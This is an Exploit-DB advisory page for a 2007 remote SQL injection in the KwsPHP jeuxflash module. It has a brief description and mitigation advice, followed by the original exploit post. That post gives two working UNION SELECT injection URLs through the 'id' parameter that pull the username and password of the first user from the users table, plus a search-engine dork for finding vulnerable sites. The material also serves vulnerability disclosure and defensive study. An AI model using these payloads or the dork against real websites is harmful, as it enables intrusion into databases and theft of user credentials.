KwsPHP Module (jeuxflash) Remote SQL Injection Vulnerability

vendor:

KwsPHP Module (jeuxflash)

by:

H-T Team (HouSSamix _ ToXiC350)

N/A

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: KwsPHP Module (jeuxflash)

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

KwsPHP Module (jeuxflash) Remote SQL Injection Vulnerability

The KwsPHP Module (jeuxflash) is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability to execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches and updates provided by the vendor. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################################################################
KwsPHP  Module   ( jeuxflash )    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.fr & http://no-hack.net


## Site:
http://koogar.alorys-hebergement.com/kwsphp/index.php?mod=downloads&filedl=30&before=8&p_dl=1
## Dork : inurl:index.php?mod=jeuxflash


## EXPLOITS :

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pseudo,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pass,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--


## Note
you must register first



## GREETZ  :  CoNaN , hell15 , RachiDox , Mr Al3FriTe , muslim4ever , DDoS

#########################################################################
KwsPHP  Module   ( jeuxflash )    Remote SQL Injection Vulnerability
#########################################################################

# milw0rm.com [2007-09-13]